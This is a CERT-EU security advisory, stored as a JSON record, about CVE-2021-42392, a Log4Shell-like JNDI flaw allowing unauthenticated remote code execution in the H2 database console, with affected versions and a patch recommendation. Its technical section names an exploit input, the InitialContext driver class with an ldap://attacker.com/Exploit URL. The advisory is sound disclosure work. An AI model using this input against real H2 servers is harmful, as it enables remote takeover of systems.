{ "file_item": { "filepath": "security-advisories", "filename": "CERT-EU-SA2022-002.pdf" }, "title": "Critical RCE Vulnerability in H2 Database Console", "serial_number": "2022-002", "publish_date": "07-01-2022 17:35:00", "description": "On the 6th of January 2022, security researchers from JFrog identified a critical JNDI-based vulnerability in the H2 database console that exploits the same root cause as the Log4Shell vulnerability. Identified by CVE-2021-42392, this security flaw could lead to unauthenticated remote code execution.
H2 is an open-source relational database management system written in Java that can be embedded within applications or run in a client-server mode.", "url_title": "2022-002", "content_markdown": "---\ntitle: 'Critical RCE Vulnerability in\u00a0H2\u00a0Database\u00a0Console'\nversion: '1.0'\nnumber: '2022-002'\ndate: 'January 7, 2022'\n---\n\n_History:_\n\n* _07/01/2022 --- v1.0 -- Initial publication_\n\n# Summary\n\nOn the 6th of January 2022, security researchers from JFrog identified a critical JNDI-based vulnerability in the H2 database console that exploits the same root cause as the Log4Shell vulnerability [1]. Identified by **CVE-2021-42392**, this security flaw could lead to unauthenticated remote code execution.\n\nH2 is an open-source relational database management system written in Java that can be embedded within applications or run in a client-server mode.\n\n# Technical Details\n\nLike in the Log4Shell, this vulnerability is due to several code paths in the H2 database framework that pass unfiltered attacker-controlled URLs to the `javax.naming.Context.lookup` function, which allows for remote code execution.\n\nSpecifically, the `org.h2.util.JdbcUtils.getConnection` method takes a driver class name and database URL as parameters. If the driver\u2019s class is assignable to the `javax.naming`, supplying a driver class such as `javax.naming.InitialContext` and a URL such as `ldap://attacker.com/Exploit` will lead to remote code execution.\n\n# Affected products\n\nThe vulnerability affects H2 database versions 1.1.100 to 2.0.204\n\n# Recommendations\n\nIt is recommended to update H2 database to version 2.0.206, released on January 5, 2022 [2].\n\n# References\n\n[1] \n\n[2] \n", "content_html": "

History:

Summary

On the 6th of January 2022, security researchers from JFrog identified a critical JNDI-based vulnerability in the H2 database console that exploits the same root cause as the Log4Shell vulnerability [1]. Identified by CVE-2021-42392, this security flaw could lead to unauthenticated remote code execution.

H2 is an open-source relational database management system written in Java that can be embedded within applications or run in a client-server mode.

Technical Details

Like in the Log4Shell, this vulnerability is due to several code paths in the H2 database framework that pass unfiltered attacker-controlled URLs to the javax.naming.Context.lookup function, which allows for remote code execution.

Specifically, the org.h2.util.JdbcUtils.getConnection method takes a driver class name and database URL as parameters. If the driver\u2019s class is assignable to the javax.naming, supplying a driver class such as javax.naming.InitialContext and a URL such as ldap://attacker.com/Exploit will lead to remote code execution.

Affected products

The vulnerability affects H2 database versions 1.1.100 to 2.0.204

Recommendations

It is recommended to update H2 database to version 2.0.206, released on January 5, 2022 [2].

References

[1] https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/

[2] https://github.com/h2database/h2database/releases/tag/version-2.0.206

", "licence": { "title": "Creative Commons Attribution 4.0 International (CC-BY 4.0)", "link": "https://creativecommons.org/licenses/by/4.0/", "restrictions": "https://cert.europa.eu/legal-notice", "author": "The Cybersecurity Service for the Union institutions, bodies, offices and agencies" } }